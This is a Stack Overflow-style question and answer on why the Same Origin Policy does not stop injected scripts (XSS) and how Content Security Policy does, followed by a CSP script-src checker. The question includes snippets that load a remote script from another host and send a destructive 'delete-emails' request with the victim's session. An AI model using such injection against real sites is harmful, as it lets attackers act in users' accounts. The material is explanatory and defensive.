Tags: javascript, security, google-chrome-extension, same-origin-policy, javascript-injection

Remote control via script injection


Some servers allow us to dynamically insert a script element with a src different from the page's domain.

We can't send data to another server due to the Same Origin Policy, but we can do things like:

  • delete all emails in some mail service
  • place orders on a shop
  • write messages on a social network, and so on...

Because the script was injected into page x from server A, and the requests are going to server A, nothing is wrong here - the Same Origin Policy doesn't work.

Are servers not protected from this by default?

On protected servers we get this:

Refused to load the script because it violates the following Content Security Policy directive: "script-src 'unsafe-eval' 'unsafe-inline'

var q = document.createElement('script');   // create a <script> element inside the target page
q.src = 'http://myserver.com/inject.js';     // src points at a different domain than the page's
document.head.append(q);                     // appending it makes the browser fetch and run the script

Such a script can be wrapped into a Chrome extension and installed. (Am I wrong here, or do extensions have some more restrictions?)

And here is inject.js, assuming the server processes a request with a delete-emails param:

var xhr = new XMLHttpRequest();
// The injected script runs inside the page, so this request goes to the
// page's own origin with the page's cookies and the SOP does not block it.
xhr.open('GET', 'http://stackoverflow.com/?delete-emails');
xhr.onreadystatechange = function() {
    if (this.readyState === 4 && this.status === 200) {
        console.log(location.href);   // request completed with 200 OK
    }
};
xhr.send();

For example, if I insert a script element (into head) into a stackoverflow.com page, I get 200 OK.


Solution

  • Because the script was injected into page x from server A, and the requests are going to server A, nothing is wrong here - the Same Origin Policy doesn't work.

    Are servers not protected from this by default?

    That's right. What you're describing is Cross-site Scripting (XSS), and the Same Origin Policy doesn't protect you from it.

    On protected servers we get this:

    Refused to load the script because it violates the following Content Security Policy directive: "script-src 'unsafe-eval' 'unsafe-inline'

    The Content Security Policy is different from the Same Origin Policy. It's a mechanism that allows servers to declare limits on what their pages are allowed to do. That helps to prevent XSS, since even if an attacker is able to inject a script, the browser won't allow it to violate the CSP.

    Such a script can be wrapped into a Chrome extension and installed.

    In general you should assume that browser extensions allow all kinds of unsafe actions that are immune from the usual browser security policies. Different browser extension frameworks make different security guarantees, but it's not something that's standardized across browsers. If you have a specific question about what is allowed by Chrome you should probably post a separate question.
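To make the CSP point concrete, here is an added example (not code from the question or the answer) that mirrors how a browser decides whether a <script src="..."> may load under a page's script-src directive. It parses a Content-Security-Policy header, falls back to default-src when script-src is absent, and matches the script URL against 'self', host sources (scheme, wildcard subdomain, port, path prefix) and scheme sources. Nonces, hashes and 'strict-dynamic' are deliberately left out, and the hosts (example.com, cdn.example.com, myserver.com) are assumed for illustration. Run it with node.

```javascript
'use strict';
// Added example: simplified evaluation of the CSP script-src directive
// for an external <script src>. Not a full CSP implementation: nonce,
// hash and 'strict-dynamic' sources are ignored.

// Parse a CSP header into a Map of directive name -> array of source tokens.
// A directive that appears twice keeps its first occurrence, as browsers do.
function parseCsp(header) {
  const directives = new Map();
  for (const part of header.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const [name, ...sources] = tokens;
    const key = name.toLowerCase();
    if (!directives.has(key)) directives.set(key, sources);
  }
  return directives;
}

function defaultPort(scheme) {
  return scheme === 'https' ? '443' : scheme === 'http' ? '80' : '';
}

// Does a host-source (e.g. https://*.example.com:443/js/) or a
// scheme-source (e.g. https:) match the script URL, given the page origin?
function hostSourceMatches(expr, url, page) {
  let scheme = null;
  let rest = expr;
  const m = expr.match(/^([a-zA-Z][a-zA-Z0-9+.-]*):\/\/(.*)$/);
  if (m) {
    scheme = m[1].toLowerCase();
    rest = m[2];
  } else if (/^[a-zA-Z][a-zA-Z0-9+.-]*:$/.test(expr)) {
    return url.protocol === expr.toLowerCase();   // scheme-source
  }
  const slash = rest.indexOf('/');
  const hostPort = slash === -1 ? rest : rest.slice(0, slash);
  const path = slash === -1 ? '' : rest.slice(slash);
  const [host, port] = hostPort.split(':');
  const urlScheme = url.protocol.replace(':', '');
  const pageScheme = page.protocol.replace(':', '');

  // Scheme: an explicit scheme must match (http may be upgraded to https);
  // no scheme means "same scheme as the page", with the same upgrade rule.
  const want = scheme || pageScheme;
  if (!(want === urlScheme || (want === 'http' && urlScheme === 'https'))) return false;

  // Host: exact match, '*' for any host, or *.example.com for subdomains only.
  const h = host.toLowerCase();
  const uh = url.hostname.toLowerCase();
  if (h === '*') {
    // any host
  } else if (h.startsWith('*.')) {
    if (!uh.endsWith(h.slice(1)) || uh === h.slice(2)) return false;
  } else if (h !== uh) {
    return false;
  }

  // Port: explicit port must match ('*' matches any); absent means the default port.
  const urlPort = url.port || defaultPort(urlScheme);
  if (port !== undefined) {
    if (port !== '*' && port !== urlPort) return false;
  } else if (urlPort !== defaultPort(urlScheme)) {
    return false;
  }

  // Path: trailing slash is a prefix match, otherwise an exact match.
  if (path) {
    if (path.endsWith('/')) {
      if (!url.pathname.startsWith(path)) return false;
    } else if (url.pathname !== path) {
      return false;
    }
  }
  return true;
}

// Decide whether a <script src=scriptUrl> inside pageUrl may load under cspHeader.
function scriptSrcAllowed(cspHeader, pageUrl, scriptUrl) {
  const directives = parseCsp(cspHeader);
  const sources = directives.get('script-src') || directives.get('default-src');
  if (sources === undefined) return true;   // no applicable directive: no restriction
  const page = new URL(pageUrl);
  const script = new URL(scriptUrl);
  for (const src of sources) {
    const s = src.toLowerCase();
    if (s === "'none'") return false;
    if (s === "'self'") {
      if (script.origin === page.origin) return true;
      continue;
    }
    if (s.startsWith("'")) continue;   // 'unsafe-inline', 'unsafe-eval', nonces, hashes: not host sources
    if (hostSourceMatches(src, script, page)) return true;
  }
  return false;
}

// Demo: the injection from the question against a weak and a hardened policy.
const weak = "script-src 'unsafe-eval' 'unsafe-inline'";
const hardened = "script-src 'self' https://cdn.example.com";
console.log('weak policy, inject.js:', scriptSrcAllowed(weak, 'https://example.com/inbox', 'http://myserver.com/inject.js'));
console.log('hardened, inject.js:', scriptSrcAllowed(hardened, 'https://example.com/inbox', 'http://myserver.com/inject.js'));
console.log('hardened, own app.js:', scriptSrcAllowed(hardened, 'https://example.com/inbox', 'https://example.com/app.js'));
```

Note that even the truncated directive in the question refuses http://myserver.com/inject.js, because a script-src without any host source allows no external origin at all; the 'unsafe-inline' keyword it carries only matters for inline scripts, and dropping it (in favour of nonces or hashes) is what closes the inline-injection route.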